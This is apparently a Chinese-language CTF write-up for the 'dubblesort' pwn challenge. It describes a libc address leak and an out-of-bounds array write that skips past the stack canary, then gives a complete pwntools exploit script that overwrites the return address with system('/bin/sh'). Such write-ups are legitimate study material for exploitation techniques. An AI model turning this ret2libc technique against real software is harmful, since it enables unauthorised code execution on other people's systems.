32位程序,保护全开,这题本地通了,远程偏移有问题,一直打不通。
本地主要有两个漏洞,一个是read后没有置0,存在内存泄漏。另一个是对要排序的数据个数没有检查,存在数组越界。
这里可以利用内存泄漏去泄漏libc基地址,然后再利用数组越界写往返回地址处写入system函数地址。
但是需要注意是,这题没办法泄漏canary,因为canary的最后一个字节为\x00,所以printf刚好无法输出。但是我们可以利用scanf输入错误字符跳过输入。
最坑的可能就是canary的位置了
unsigned int v11; // [esp+7Ch] [ebp-10h]
v11 = __readgsdword(0x14u);
经过调试canary没有在ebp-0x10处,但是确实是在esp+0x7c处
需要注意的是,最后进行会按照升序排序,所以需要注意输入的数字大小关系。不过binsh的地址是大于system的地址的,所以不用担心啦
from pwn import *
context(arch = "i386", os = "linux", endian = "little")
context.terminal = ["tmux", "splitw", "-h"]
io = process("./dubblesort")
#io = remote("node4.buuoj.cn", 27775)
elf = ELF("dubblesort")
libc = elf.libc
#gdb.attach(io, 'b *$rebase(0x000009c3)')
io.sendafter(b"name :", b'A'*9)
io.recvuntil(b"Hello ")
io.recvuntil(b"A"*8)
libc.address = u32(io.recv(4)) - 0x1eb041
print(hex(libc.address))
system = libc.sym.system
binsh = next(libc.search(b"/bin/sh\x00"))
print("system:", hex(system))
print("binsh:", hex(binsh))
io.sendlineafter(b"sort :", b"35")
for i in range(24):
io.sendlineafter(b"number : ", str(i).encode())
io.sendlineafter(b"number : ", b"+")
for i in range(25, 34):
io.sendlineafter(b"number : ", str(system).encode())
io.sendlineafter(b"number : ", str(binsh).encode())
#pause()
io.interactive()